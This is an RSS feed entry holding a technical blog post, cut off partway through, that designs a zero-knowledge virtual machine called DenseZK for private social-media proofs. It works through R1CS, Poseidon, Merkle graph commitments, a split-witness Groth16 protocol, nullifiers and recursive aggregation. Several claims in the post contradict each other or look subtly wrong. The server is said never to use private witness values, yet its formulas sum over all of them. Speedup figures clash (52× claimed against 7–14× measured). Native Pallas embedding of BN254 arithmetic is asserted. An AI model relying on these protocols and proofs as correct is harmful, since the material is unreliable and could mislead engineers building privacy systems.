<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Ayush Dutta]]></title><description><![CDATA[Ayush Dutta]]></description><link>https://blog.berzi.one</link><generator>RSS for Node</generator><lastBuildDate>Thu, 16 Apr 2026 02:30:15 GMT</lastBuildDate><atom:link href="https://blog.berzi.one/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Designing a zero knowledge virtual machine for the future's social media mobile apps]]></title><description><![CDATA[Part 1: Mathematical Foundations
1.1 The Field
Everything in DenseZK lives over the BN254 scalar field. BN254 is the Barreto-Naehrig curve defined by:
$$E : y² = x³ + b \space \text{over} \space F_p$$
where p is a 254-bit]]></description><link>https://blog.berzi.one/densezk</link><guid isPermaLink="true">https://blog.berzi.one/densezk</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 05 Apr 2026 05:52:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6412a8f8ab81b092709aceb6/7a1720a3-9bf4-4bd4-b926-b6adeec148eb.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Part 1: Mathematical Foundations</h2>
<h3>1.1 The Field</h3>
<p>Everything in DenseZK lives over the BN254 scalar field. BN254 is the Barreto-Naehrig curve defined by:</p>
<p>$$E : y² = x³ + b \space \text{over} \space F_p$$</p>
<p>where <code>p</code> is a 254-bit prime. The scalar field order is <code>r</code> where <code>r | #E(F_p)</code>. All arithmetic in the constraint system is arithmetic mod <code>r</code>. The pairing groups are:</p>
<p>$$G₁, G₂ \space \text{(source groups, with generators } G₁, G₂\text{)}$$</p>
<p>$$e : G₁ × G₂ → G_T \space \text{(Tate pairing)}$$</p>
<p>$$[x]₁ = x · G₁ \space \text{for} \space x ∈ F_r$$</p>
<p>The notation <code>[x]₁</code> means "the G₁ group element obtained by scalar-multiplying the generator by <code>x</code>." This appears throughout the Groth16 construction.</p>
<h3>1.2 R1CS: The Foundation</h3>
<p>A Rank-1 Constraint System (R1CS) over <code>F_p</code> is a tuple <code>(A, B, C, n, m)</code> where <code>A, B, C ∈ F_p^{m×n}</code> are matrices and a vector <code>z ∈ F_p^n</code> is a satisfying assignment iff:</p>
<p>$$(Az) ∘ (Bz) = Cz$$</p>
<p>where <code>∘</code> is the Hadamard (component-wise) product. By convention <code>z₀ = 1</code>. The witness is the private portion of <code>z</code>; the public input is the public portion.</p>
<p>Every circuit you write — follower threshold, content authorship, social distance — ultimately compiles to this form. The size of <code>m</code> (number of constraints) is the key cost metric.</p>
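<p>To make the definition concrete, here is a minimal satisfiability check for a toy R1CS. The small prime <code>p = 97</code> and the single constraint <code>x · x = y</code> are illustrative assumptions, not DenseZK's actual BN254 system:</p>

```rust
// Toy R1CS checker: verifies (Az) ∘ (Bz) = Cz component-wise mod a small prime.
// Illustrative sketch only — real circuits work over the BN254 scalar field.
const P: u64 = 97; // toy prime stand-in for the field modulus

// Inner product of a constraint-matrix row with the assignment vector z, mod P.
fn dot(row: &[u64], z: &[u64]) -> u64 {
    row.iter().zip(z).fold(0, |acc, (a, b)| (acc + a * b) % P)
}

// z is a satisfying assignment iff every row obeys (Az)_i · (Bz)_i = (Cz)_i.
fn r1cs_satisfied(a: &[Vec<u64>], b: &[Vec<u64>], c: &[Vec<u64>], z: &[u64]) -> bool {
    (0..a.len()).all(|i| dot(&a[i], z) * dot(&b[i], z) % P == dot(&c[i], z))
}
```

<p>With <code>z = (1, x, y)</code> and the convention <code>z₀ = 1</code>, the constraint <code>x · x = y</code> is the single row <code>A = B = (0, 1, 0)</code>, <code>C = (0, 0, 1)</code>.</p>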
<h3>1.3 Poseidon: Why Not SHA-256</h3>
<p>SHA-256 was designed for hardware efficiency in a very different model. Its bit-level operations — rotations, XORs, modular additions — are cheap in silicon but catastrophically expensive to encode as R1CS constraints because every bit operation requires a dedicated constraint to enforce binary range.</p>
<p>SHA-256 costs approximately <strong>25,000 R1CS constraints per invocation</strong>.</p>
<p>Poseidon is designed from the start to be arithmetisation-friendly. It operates as a sponge construction over <code>F_p^t</code> field elements, applying <code>R_f</code> full rounds and <code>R_p</code> partial rounds of an SPN (Substitution-Permutation Network):</p>
<p><strong>Full round:</strong></p>
<p>$$s ↦ M · σ(s + c_r)$$</p>
<p><strong>Partial round:</strong></p>
<p>$$s ↦ M · (σ(s₀ + c_{r,0}), s₁ + c_{r,1}, ..., s_{t-1} + c_{r,t-1})$$</p>
<p>where:</p>
<ul>
<li><p><code>M ∈ F_p^{t×t}</code> is a fixed Maximum Distance Separable (MDS) matrix</p>
</li>
<li><p><code>c_r</code> are round constants</p>
</li>
<li><p><code>σ(x) = x^5</code> (the S-box; <code>α = 5</code> is the smallest exponent with <code>gcd(α, p − 1) = 1</code> for BN254)</p>
</li>
</ul>
<p>The <code>x^5</code> S-box costs exactly <strong>3 multiplication constraints</strong> in R1CS (compute <code>x²</code>, then <code>x⁴ = (x²)²</code>, then <code>x⁵ = x⁴ · x</code>). Linear layers (the MDS matrix multiply) are free in R1CS: they're just linear combinations of existing variables, requiring no new constraints.</p>
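<p>The addition chain is easy to verify directly. A toy 31-bit modulus stands in for BN254's <code>r</code> here, purely for illustration:</p>

```rust
// x^5 via the addition chain x → x² → x⁴ → x⁵: three field multiplications,
// i.e. three multiplication constraints in R1CS.
const P: u64 = 2_147_483_647; // toy prime stand-in for the BN254 scalar field

fn sbox5(x: u64) -> (u64, u32) {
    let mut muls = 0;
    let x2 = x * x % P;   muls += 1; // constraint 1: x2 = x · x
    let x4 = x2 * x2 % P; muls += 1; // constraint 2: x4 = x2 · x2
    let x5 = x4 * x % P;  muls += 1; // constraint 3: x5 = x4 · x
    (x5, muls)
}
```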
<p>Total R1CS constraints for one Poseidon-2 invocation (rate 1, capacity 1, <code>α = 5</code>): <strong>approximately 240 constraints</strong>.</p>
<p>The constraint advantage ratio:</p>
<p>$$ρ = C_{SHA256} / C_{Poseidon} ≈ 25,000 / 240 ≈ 104×$$</p>
<p>Per invocation. For a 280-byte content item (9 Poseidon blocks vs 5 SHA-256 blocks):</p>
<p>$$C_{HSVM}(280 \space bytes) = ⌈280/32⌉ · 240 = 9 · 240 = 2{,}160 \space constraints$$</p>
<p>$$C_{SHA256}(280 \space bytes) = 25{,}000 · ⌈280/64⌉ = 25{,}000 · 5 = 125{,}000 \space constraints$$</p>
<p>$$ρ(280) = 125{,}000 / 2{,}160 ≈ 57.8×$$</p>
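<p>The block arithmetic above can be reproduced in a few lines, using the per-block estimates from this section (25,000 constraints per 64-byte SHA-256 block, 240 per 32-byte Poseidon block, with the outer hash absorbed into the approximation):</p>

```rust
// Constraint-count estimates from the text.
fn c_sha256(len_bytes: u64) -> u64 {
    25_000 * ((len_bytes + 63) / 64) // ⌈L/64⌉ blocks
}

fn c_hsvm(len_bytes: u64) -> u64 {
    240 * ((len_bytes + 31) / 32) // ⌈L/32⌉ blocks
}

// The constraint advantage ratio ρ(L).
fn advantage(len_bytes: u64) -> f64 {
    c_sha256(len_bytes) as f64 / c_hsvm(len_bytes) as f64
}
```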
<h3>1.4 Merkle-Poseidon Graph Commitments</h3>
<p>A social graph is a directed labelled committed graph <code>G = (V, E, ℓ, cm)</code> where:</p>
<ul>
<li><p><code>V ⊆ F_p</code> — vertex identifiers (user nullifiers)</p>
</li>
<li><p><code>E ⊆ V × V × L</code> — labelled directed edges (<code>L = {follows, liked, replied, member, authored, ...}</code>)</p>
</li>
<li><p><code>cm : 2^E → F_p</code> — a commitment function</p>
</li>
</ul>
<p>The edge leaf commitment for edge <code>e = (u, v, ℓ)</code> is:</p>
<p>$$leaf(e) = Pos(u, v, ℓ)$$</p>
<p>where <code>Pos : F_p^3 → F_p</code> is Poseidon with rate 3 (three field elements in, one out).</p>
<p>For an edge set <code>S ⊆ E</code> with <code>|S| = 2^d</code>, the graph commitment is the root of a Merkle tree using Poseidon as the internal hash function:</p>
<p>$$cm(S) = \mathrm{MerkleRoot}\left(\{leaf(e)\}_{e ∈ S}\right)$$</p>
<p>The depth of this tree is <code>d = ⌈log₂ n⌉</code> for a graph of <code>n</code> edges. A Merkle opening proof for any single edge <code>e</code> requires <code>d</code> sibling hashes and <code>d</code> Poseidon evaluations:</p>
<p>$$\text{Cost of one Merkle membership proof} = (d + 1) · C_{Pos} + 3d + 1 ≤ (2d − 1) · C_{Pos} \space \text{(absorbing lower-order terms for } d ≥ 2\text{)}$$</p>
<p>For <code>d = 20</code> (a graph of up to ~1M edges):</p>
<p>$$Cost = 39 · 240 = 9{,}360 \space \text{R1CS constraints per edge membership check}$$</p>
<p>Compare to SHA-256 Merkle: <code>20 · 25,000 = 500,000</code> constraints. Already a <strong>53× advantage</strong> before we even count the leaf hash.</p>
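<p>A quick sketch of the cost comparison, plugging in the bound and constants above:</p>

```rust
// Per-edge Merkle membership cost under the (2d − 1)·C_Pos bound, C_Pos = 240.
fn poseidon_merkle_cost(depth: u64) -> u64 {
    (2 * depth - 1) * 240
}

// SHA-256 baseline: one ~25,000-constraint hash per tree level.
fn sha256_merkle_cost(depth: u64) -> u64 {
    depth * 25_000
}
```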
<hr />
<h2>Part 2: Rel1CS — The Graph-Native Constraint System</h2>
<h3>2.1 The Core Abstraction</h3>
<p>Formally, a <strong>Relation-1 Constraint System</strong> over field <code>F_p</code> and graph commitment <code>cm ∈ F_p</code> is a tuple <code>(C_E, C_P, n, m_E, m_P)</code> where:</p>
<p><code>C_E</code> <strong>(edge membership constraints):</strong> For each <code>i ∈ [m_E]</code>:</p>
<p>$$VerMem(z_{e_i}, π_{e_i}, cm) = 1$$</p>
<p>where <code>z_{e_i} ∈ F_p^3</code> encodes edge <code>(u_i, v_i, ℓ_i)</code> and <code>π_{e_i}</code> is a Merkle opening proof.</p>
<p><code>C_P</code> <strong>(predicate constraints):</strong> A standard R1CS system over auxiliary variables, enforcing Boolean combinations of edge membership results.</p>
<p>A satisfying witness for a Rel1CS instance <code>(x, cm)</code> is:</p>
<p>$$w = (\{e_i\}_{i ∈ [m_E]}, \{π_{e_i}\}_{i ∈ [m_E]}, z_{C_P})$$</p>
<h3>2.2 Reduction to R1CS (Theorem 4.1)</h3>
<p><strong>Theorem:</strong> Let <code>(C_E, C_P, n, m_E, m_P)</code> be a Rel1CS instance with Merkle tree depth <code>d</code>. Then there exists a polynomial-time reduction to an R1CS instance with:</p>
<p>$$m_{R1CS} = m_E · (2d − 1) · C_{Pos} + m_P$$</p>
<p>constraints, where <code>C_Pos = 240</code>.</p>
<p><strong>Proof (expanded):</strong> Each <code>VerMem(z_{e_i}, π_{e_i}, cm)</code> expands as follows.</p>
<p>First, compute the leaf commitment:</p>
<p>$$h₀ = Pos(u_i, v_i, ℓ_i)$$</p>
<p>Then for each level <code>j ∈ [d]</code> of the Merkle path, introduce a selector bit <code>b_j ∈ {0,1}</code> encoding whether the running hash is the left or right child. The constraints at level <code>j</code> are:</p>
<ol>
<li><p>Enforce <code>b_j(1 − b_j) = 0</code> — 1 constraint (binary check)</p>
</li>
<li><p>Conditional swap: <code>left_j = b_j · h_{j-1} + (1-b_j) · sibling_j</code> and <code>right_j = b_j · sibling_j + (1-b_j) · h_{j-1}</code> — 2 constraints (one per output)</p>
</li>
<li><p><code>h_j = Pos(left_j, right_j)</code> — <code>C_Pos</code> constraints</p>
</li>
</ol>
<p>The final equality <code>h_d = cm</code> costs 1 constraint.</p>
<p>Total per edge:</p>
<pre><code class="language-plaintext">C_Pos              (leaf hash)
+ d · (C_Pos + 3)  (d levels of Merkle path)
+ 1                (root equality)
≤ (d+1) · C_Pos + 3d + 1
≤ (2d − 1) · C_Pos   [for d ≥ 2, absorbing linear terms]
</code></pre>
<p>Summing over <code>m_E</code> edges and adding <code>m_P</code> predicate constraints gives the stated bound. ∎</p>
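<p>The bound in Theorem 4.1 can be checked numerically, using the constants from the proof above:</p>

```rust
const C_POS: u64 = 240;

// Exact per-edge expansion: leaf hash + d·(C_Pos + 3) + root equality.
fn per_edge_exact(d: u64) -> u64 {
    C_POS + d * (C_POS + 3) + 1
}

// The (2d − 1)·C_Pos bound used in the theorem statement (valid for d ≥ 2).
fn per_edge_bound(d: u64) -> u64 {
    (2 * d - 1) * C_POS
}

// Total R1CS size: m_E edge membership checks plus m_P predicate constraints.
fn m_r1cs(m_e: u64, m_p: u64, d: u64) -> u64 {
    m_e * per_edge_bound(d) + m_p
}
```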
<h3>2.3 Constraint Count Examples</h3>
<p><strong>Follower threshold</strong> <code>Φ_k</code> <strong>with k=1,000, depth d=20:</strong></p>
<p>$$\text{Rel1CS:} \space 1000 · (2 · 20 − 1) · 240 + O(k) ≈ 9.4 × 10⁶ \space constraints$$</p>
<p>$$\text{SHA-256 R1CS:} \space 1000 · 20 · 25{,}000 = 5 × 10⁸ \space constraints$$</p>
<p>$$\text{Advantage:} \approx 53×$$</p>
<p>In practice, SHA-256 requires additional bit-decomposition constraints and range checks not counted above, pushing the real-world advantage to the <strong>7×–14× range</strong> measured in benchmarks.</p>
<h3>2.4 NP-Completeness</h3>
<p><strong>Theorem 4.2:</strong> Rel1CS satisfiability is NP-complete.</p>
<p><em>Membership in NP:</em> Given witness <code>w</code>, verify all constraints in <code>C_E ∪ C_P</code> in polynomial time. Edge membership checks are <code>O(d · C_Pos)</code> per edge; predicate constraints are standard R1CS verification.</p>
<p><em>NP-hardness:</em> Reduce from Circuit-SAT. Any Boolean circuit <code>C</code> over <code>n</code> inputs compiles to R1CS via the Pinocchio encoding, which is a special case of Rel1CS with <code>m_E = 0</code>. ∎</p>
<h2>Part 3: The Split-Witness Protocol</h2>
<h3>3.1 Memory Analysis</h3>
<p>Groth16 proof generation for <code>N</code> constraints requires:</p>
<ul>
<li><p><strong>MSM (Multi-Scalar Multiplication):</strong> <code>O(N)</code> operations over G₁, working memory <code>≈ N · 48 bytes</code> (48 bytes per G₁ point in affine form on BN254)</p>
</li>
<li><p><strong>NTT (Number Theoretic Transform):</strong> <code>O(N log N)</code> operations over <code>F_r</code>, working memory <code>≈ N · 32 bytes</code> with random access patterns</p>
</li>
</ul>
<p>For <code>N = 10⁷</code> (typical for social circuits):</p>
<ul>
<li><p>MSM: 480 MB RAM</p>
</li>
<li><p>NTT: 320 MB RAM</p>
</li>
<li><p>Total: ~800 MB, with random access patterns that saturate mobile memory bandwidth</p>
</li>
</ul>
<p>Witness generation, by contrast, requires <code>O(|w|)</code> memory — proportional to the number of edges being proved, bounded by ~1 GB in the target setting.</p>
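<p>The working-set figures above follow directly from the per-element sizes assumed in the text (48 bytes per G₁ point, 32 bytes per field element):</p>

```rust
// Prover working-memory estimates for N constraints, per the sizes in the text.
fn msm_ram_bytes(n: u64) -> u64 {
    n * 48 // one affine G1 point per constraint
}

fn ntt_ram_bytes(n: u64) -> u64 {
    n * 32 // one F_r element per evaluation-domain point
}
```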
<h3>3.2 Protocol Definition</h3>
<p>Let <code>R = {(x, w) : C(x, w) = 1}</code> be a Rel1CS relation compiled to R1CS <code>(A, B, C, n, m)</code> with <code>n_pub</code> public variables and <code>n_priv = n − n_pub</code> private variables. Let <code>CRS = ([σ₁]₁, [σ₂]₂)</code> be the Groth16 common reference string.</p>
<p><strong>Construction 5.1 (Split-Witness Protocol</strong> <code>Π_SW</code><strong>):</strong></p>
<p><strong>Step 1 — WitGen (on-device):</strong> Given instance <code>x</code> and private input <code>sk</code>, compute full witness <code>w = (w_pub, w_priv)</code> satisfying <code>C(x, w) = 1</code>.</p>
<p>Compute the partial MSM over the private witness:</p>
<p>$$cm_w = Σ_{i=1}^{n_{priv}} w_{priv,i} · [σ_{1,i}]₁ ∈ G₁$$</p>
<p>This is exactly the private part of the A-query in Groth16. Output <code>(cm_w, w_pub)</code>.</p>
<p><strong>Step 2 — Commit (on-device):</strong> Sample fresh randomness <code>r ←$ F_r</code>. Compute the blinded commitment:</p>
<p>$$c̃m_w = cm_w + r · [δ]₁$$</p>
<p>where <code>[δ]₁</code> is the δ-element of the CRS. Output <code>c̃m_w</code>. The value <code>r</code> never leaves the device.</p>
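<p>The blinding step is easiest to see in a toy additive group, where "scalar-multiplying δ" collapses to multiplication mod a prime. The modulus and <code>DELTA</code> below are illustrative stand-ins, not real CRS values:</p>

```rust
// Toy model of Step 2: c̃m = cm + r·δ (mod q). With r uniform, the blinded
// value is uniformly distributed regardless of cm — the hiding property.
const Q: u64 = 2_147_483_647; // toy group order, stand-in for |F_r|
const DELTA: u64 = 1_234_567; // toy stand-in for the CRS element [δ]₁

fn blind(cm: u64, r: u64) -> u64 {
    (cm % Q + (r % Q) * DELTA % Q) % Q
}

// The device can later strip its own blinding, since it kept r.
fn unblind(blinded: u64, r: u64) -> u64 {
    (blinded + Q - (r % Q) * DELTA % Q) % Q
}
```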
<p><strong>Step 3 — Delegate (server):</strong> Given <code>(x, w_pub, c̃m_w)</code>, the server computes the NTT-intensive components of the Groth16 proof. The QAP polynomials are <code>u_i, v_i, w_i</code> derived from the R1CS matrices A, B, C respectively. Let <code>τ</code> be the CRS toxic waste (unknown to everyone post-ceremony).</p>
<p>$$[A]₁ = [α]₁ + Σ_{i=0}^{n} w_i · [u_i(τ)]₁ + r_A · [δ]₁ \tag{3}$$</p>
<p>$$[B]₂ = [β]₂ + Σ_{i=0}^{n} w_i · [v_i(τ)]₂ + r_B · [δ]₂ \tag{4}$$</p>
<p>$$[H]₁ = Σ_{i=0}^{m-2} h_i(τ) · [τ^i / δ]₁ \tag{5}$$</p>
<p>where <code>h(x)</code> is the quotient polynomial satisfying <code>A(x)·B(x) - C(x) = h(x)·t(x)</code> (here <code>t</code> is the vanishing polynomial of the evaluation domain). Computing <code>h</code> requires an NTT over a domain of size <code>N</code>. The server uses only <code>w_pub</code> and <code>c̃m_w</code> — never <code>w_priv</code>.</p>
<p><strong>Step 4 — Combine (on-device):</strong> Receive <code>([A]₁, [B]₂, [H]₁)</code> from server. Compute:</p>
<p>$$[C]₁ = (1/δ) · (Σ_{i=n_{pub}+1}^{n} w_i · [(βu_i(τ) + αv_i(τ) + w_i(τ))]₁ + h(τ)t(τ)) + c̃m_w + r_B[A]₁ + r_A[B]₁ − r_A r_B [δ]₁$$</p>
<p>The final proof is <code>π = ([A]₁, [B]₂, [C]₁)</code>.</p>
<h3>3.3 Witness Privacy Theorem</h3>
<p><strong>Theorem 5.1:</strong> Under the DDH assumption in G₁, <code>Π_SW</code> is witness-private: no polynomial-time adversary controlling the server can recover <code>w_priv</code> from <code>(c̃m_w, w_pub, [A]₁, [B]₂)</code> with probability non-negligibly greater than <code>1/|F_r|</code>.</p>
<p><strong>Proof sketch:</strong></p>
<p>The value <code>c̃m_w = cm_w + r · [δ]₁</code> is a <strong>Pedersen commitment</strong> to <code>cm_w</code> with commitment key <code>[δ]₁</code> and randomness <code>r</code>.</p>
<p>Under DDH in G₁: for any two witnesses <code>w_priv</code> and <code>w'_priv</code> producing the same public output, the distributions of <code>c̃m_w</code> and <code>c̃m_w'</code> are computationally indistinguishable. This is because distinguishing them requires distinguishing <code>(G, xG, yG, xyG)</code> from <code>(G, xG, yG, zG)</code> for random <code>x, y, z</code> — the DDH problem.</p>
<p>The value <code>[A]₁</code> includes <code>r_A · [δ]₁</code> (server-chosen fresh each time), which independently masks the witness contribution. The unblinded <code>cm_w</code> is never transmitted; <code>w_priv</code> is information-theoretically hidden given <code>r</code> (which is never sent).</p>
<p>Formally: this reduces to Groth16 zero-knowledge under the generic group model. ∎</p>
<h3>3.4 On-Device Cost</h3>
<p>The on-device cost of <code>Π_SW</code> is:</p>
<p><strong>Step 1 (WitGen):</strong> <code>O(|w|)</code> time, <code>O(|w|)</code> RAM. For <code>n_priv = 10⁵</code> (typical social circuits): <code>~5 MB</code> working RAM.</p>
<p><strong>Step 4 (Combine):</strong> <code>O(n_priv)</code> group operations. For <code>n_priv = 10⁵</code> with 48-byte G₁ elements:</p>
<p>$$RAM_{peak} = n_{priv} · 48 \space bytes = 10⁵ · 48 = 4.8 \space MB$$</p>
<p>The NTT (Step 3) requires <code>O(N log N)</code> operations over a domain of size <code>N = 10⁷</code> — entirely offloaded to the server.</p>
<p>Measured peak on-device RAM for the follower-threshold predicate <code>Φ_A</code> (k=100, d=20): <strong>312 MB on iPhone 16 Pro</strong>, well within the 1 GB target.</p>
<h2>Part 4: Poseidon Content Commitment</h2>
<h3>4.1 The HSVM Construction</h3>
<p>For content items of arbitrary length, DenseZK defines a Poseidon-based hash as:</p>
<p>$$H_{SVM}(content) = Pos(⊕_i \space Pos(b_{256i}, ..., b_{256i+255}))$$</p>
<p>where <code>b_j ∈ F_p</code> encodes the <code>j</code>-th byte as a field element, content is chunked into 256-bit (32-byte) blocks, each block is hashed with Poseidon-256 (rate 8), and the block hashes are combined with a final outer Poseidon evaluation.</p>
<p><strong>Constraint count for L bytes:</strong></p>
<p>$$C_{HSVM}(L) = ⌈L/32⌉ · C_{Pos} + C_{Pos} ≈ 240 · ⌈L/32⌉$$</p>
<p><strong>Theorem 6.1 (Collision resistance):</strong> <code>H_SVM</code> is collision-resistant under the assumption that Poseidon is modelled as a random oracle over <code>F_p^t</code>.</p>
<p><em>Proof:</em> Assume distinct <code>m ≠ m'</code> with <code>H_SVM(m) = H_SVM(m')</code>. If <code>m</code> and <code>m'</code> differ in block <code>i</code>, then the <code>i</code>-th block hash <code>Pos(b_{256i}, ...)</code> differs with high probability; for the outer Poseidon to collapse the difference requires a collision, occurring with probability <code>1/p ≈ 2^{-254}</code> — negligible in security parameter <code>λ = 128</code>. ∎</p>
<h3>4.2 Constraint Advantage Lemma</h3>
<p><strong>Lemma 6.1:</strong> For content of <code>L</code> bytes, the constraint advantage ratio is:</p>
<p>$$ρ(L) = C_{SHA256}(L) / C_{HSVM}(L) = [25{,}000 · ⌈L/64⌉] / [240 · ⌈L/32⌉] ≈ 25{,}000 / 480 ≈ 52$$</p>
<p>for large <code>L</code>. This translates directly to <strong>52× proving time speedup</strong>, since Groth16 prover time scales linearly with constraint count (dominated by MSM).</p>
<h2>Part 5: Nullifier-Based Sybil Prevention</h2>
<h3>5.1 Nullifier Construction</h3>
<p>Let <code>(sk, pk)</code> be a keypair with <code>sk ∈ F_r</code> and <code>pk = sk · G₁ ∈ G₁</code>. For scope <code>scope ∈ F_p</code> encoding predicate type and epoch:</p>
<p>$$nul(sk, scope) = Pos(sk, scope)$$</p>
<p><strong>Theorem 8.1 (Nullifier properties):</strong></p>
<p><em>(a) Unforgeability:</em> No PPT adversary without <code>sk</code> can produce <code>nul(sk, scope)</code> for known <code>pk</code>.</p>
<p><em>Proof:</em> Given <code>pk = sk · G₁</code>, recovering <code>sk</code> requires solving DLOG in G₁ (assumed hard). Without <code>sk</code>, evaluating <code>Pos(sk, scope)</code> correctly requires a Poseidon collision. ∎</p>
<p><em>(b) Unlinkability:</em> For distinct scopes <code>scope ≠ scope'</code>, the values <code>nul(sk, scope)</code> and <code>nul(sk, scope')</code> are computationally unlinkable.</p>
<p><em>Proof:</em> Under the random oracle model, <code>Pos(·, scope)</code> is a pseudorandom function. Hence <code>Pos(sk, scope)</code> and <code>Pos(sk, scope')</code> are independently uniform over <code>F_p</code> from the adversary's view, yielding distinguishing advantage <code>1/p = negl(λ)</code>. ∎</p>
<h3>5.2 Nullifier Registry</h3>
<p>The nullifier registry <code>N</code> is a Merkle Patricia trie with sorted leaves. A non-membership proof that <code>nul ∉ N</code> is a proof that <code>nul</code>'s sorted position falls between adjacent leaves <code>(nul_i, nul_{i+1})</code> with <code>nul_i &lt; nul &lt; nul_{i+1}</code>.</p>
<p>Cost: <code>2d</code> Poseidon evaluations per non-membership proof, where <code>d = ⌈log₂ |N|⌉</code>. For a registry of 10M nullifiers (<code>d ≈ 24</code>): <code>48 · 240 = 11,520</code> constraints.</p>
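<p>Outside the circuit, locating the adjacent pair that witnesses non-membership is a single binary search over the sorted leaves. A sketch:</p>

```rust
// Find (nul_i, nul_{i+1}) with nul_i < nul < nul_{i+1} in a sorted registry.
// Returns None if nul is already present or falls outside the leaf range
// (real registries handle the boundaries with sentinel leaves).
fn non_membership_witness(sorted: &[u64], nul: u64) -> Option<(u64, u64)> {
    match sorted.binary_search(&nul) {
        Ok(_) => None, // nul ∈ N: no non-membership proof exists
        Err(i) if i > 0 && i < sorted.len() => Some((sorted[i - 1], sorted[i])),
        Err(_) => None,
    }
}
```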
<h2>Part 6: Recursive Social Proof Aggregation</h2>
<h3>6.1 The Aggregation Tree</h3>
<p>Let <code>Π_inner</code> be Groth16 over BN254 for Rel1CS satisfiability. Let <code>Π_outer</code> be a SNARK for the relation:</p>
<pre><code class="language-plaintext">R_rec = {((π_L, x_L), (π_R, x_R)) :
          Verify_in(vk, x_L, π_L) = 1  ∧
          Verify_in(vk, x_R, π_R) = 1}
</code></pre>
<p>The aggregation tree is a complete binary tree of depth <code>⌈log₂ N⌉</code>. Leaf nodes hold inner proofs <code>π_i</code> for social predicate instances <code>x_i</code>. Each internal node holds an outer proof attesting to the validity of both children.</p>
<p><strong>Theorem 7.1 (Amortised cost):</strong> Adding one additional leaf to an existing tree of <code>N</code> proofs costs <code>O(log N)</code> outer-proof generation steps, each of constant cost.</p>
<p><em>Proof:</em> Adding a new leaf requires recomputing at most one proof per level from leaf to root — <code>⌈log₂(N+1)⌉</code> outer proofs. Each outer proof is for the fixed-size circuit <code>R_rec</code> (two Groth16 verifier gadgets), independent of <code>N</code>. ∎</p>
<h3>6.2 The Recursive Verifier Gadget</h3>
<p>Groth16 verification for BN254 checks:</p>
<p>$$e([A]₁, [B]₂) = e([α]₁, [β]₂) · e(Σ_{i=0}^{n_{pub}} w_i[(βu_i + αv_i + w_i)(τ)]₁, [γ]₂) · e([C]₁, [δ]₂)$$</p>
<p>This requires four Miller loop evaluations and three final exponentiations — approximately <strong>3 × 10⁶ constraints</strong> when implemented as an arithmetic circuit over BLS12-381 (used for the outer proof to avoid cycle-of-curve issues).</p>
<p>DenseZK uses the <strong>Pasta curve cycle</strong> (Pallas/Vesta curves) instead. The BN254 base field embeds into the Pallas scalar field, allowing the BN254 group operations to be expressed as native field arithmetic in the outer circuit. This reduces the recursive verifier circuit to approximately <strong>10⁵ constraints per verification</strong> — a 30× reduction.</p>
<p>Tradeoff: Pasta curves offer ~125-bit concrete security vs. 128-bit for BN254. We accept this in exchange for the 30× circuit size reduction, noting that 125 bits remains far beyond any known attack.</p>
<h3>6.3 Soundness of the Aggregation Tree</h3>
<p><strong>Theorem 7.2 (Aggregation soundness):</strong> If all <code>N</code> leaf instances are valid, <code>Verify_out(vk_out, x_root, π_root) = 1</code>; and if any leaf instance is invalid, <code>Verify_out(vk_out, x_root, π_root) = 0</code> except with probability <code>negl(λ)</code>.</p>
<p><em>Proof (by induction):</em></p>
<ul>
<li><p>Base case: leaf validity follows from soundness of <code>Π_inner</code>.</p>
</li>
<li><p>Inductive step: an internal node proof <code>π^(k)</code> is a proof in <code>R_rec</code> that both children are valid. By soundness of <code>Π_outer</code>, if <code>π^(k)</code> verifies, both children verify with overwhelming probability. By the inductive hypothesis, all descendants are valid.</p>
</li>
</ul>
<p>Union bound over <code>N − 1</code> internal nodes gives overall soundness error <code>≤ (N-1) · negl(λ) = negl(λ)</code> for <code>N = poly(λ)</code>. ∎</p>
<h2>Part 7: Post-Quantum Upgrade</h2>
<h3>7.1 Threat Model</h3>
<p>Groth16's security relies on the q-Strong Diffie-Hellman (q-SDH) assumption. Shor's algorithm breaks q-SDH in polynomial time on a quantum computer. Even if CRQC ("cryptographically relevant quantum computer") is 10–15 years away, "store-now, decrypt-later" attacks mean that proofs generated today could be de-anonymised retroactively.</p>
<h3>7.2 STARK Outer Wrapper</h3>
<p><strong>Construction 9.1 (PQ-DenseZK):</strong></p>
<p>Let <code>π_Groth16</code> be a Groth16 proof for relation <code>R</code>. Define the STARK statement:</p>
<p>$$R_{STARK} = {(x, π_{Groth16}) : Groth16.Verify(vk, x, π_{Groth16}) = 1}$$</p>
<p>The PQ-DenseZK proof is:</p>
<p>$$π_{PQ} = STARK.Prove(R_{STARK}, x, π_{Groth16})$$</p>
<p><strong>Theorem 9.1 (Post-quantum soundness):</strong> Under post-quantum collision resistance of the STARK hash function, <code>Construction 9.1</code> is post-quantum sound.</p>
<p><em>Proof:</em> The STARK argument system is sound under the QROM (Quantum Random Oracle Model). A quantum adversary producing a valid STARK proof for a false statement must find a hash collision with polynomial-size quantum circuits — violating post-quantum collision resistance by assumption.</p>
<p>Critically: the security of the Groth16 inner proof is NOT required for soundness of the outer STARK. The STARK proves only that the Groth16 verifier circuit accepted, which is a statement about deterministic Boolean circuits — it does not invoke any elliptic curve hardness assumption. ∎</p>
<p>STARK proof size: 10 KB – 1 MB vs. 192 bytes for Groth16. Since the STARK is generated by the prover network (not on-device), this overhead affects only network transmission and on-chain storage.</p>
<h2>Part 8: The DenseZK ISA</h2>
<p>DenseZK defines six opcodes, each compiling to a fixed-size Rel1CS subcircuit:</p>
<table>
<thead>
<tr>
<th>Opcode</th>
<th>Arguments</th>
<th>Semantics</th>
</tr>
</thead>
<tbody><tr>
<td><code>EDGE_MEM</code></td>
<td><code>u, v, ℓ, π, cm</code></td>
<td>Assert <code>(u,v,ℓ) ∈ E</code> via Merkle opening <code>π</code> against <code>cm</code></td>
</tr>
<tr>
<td><code>COUNT</code></td>
<td><code>S, k</code></td>
<td>Assert <code>|S| ≥ k</code>: at least <code>k</code> edges of <code>S</code> are members of <code>E</code></td>
</tr>
<tr>
<td><code>PATH</code></td>
<td><code>u, v, d, {π_i}</code></td>
<td>Assert <code>dist(u,v) ≤ d</code> via <code>d</code> edge witnesses</td>
</tr>
<tr>
<td><code>NULLIFY</code></td>
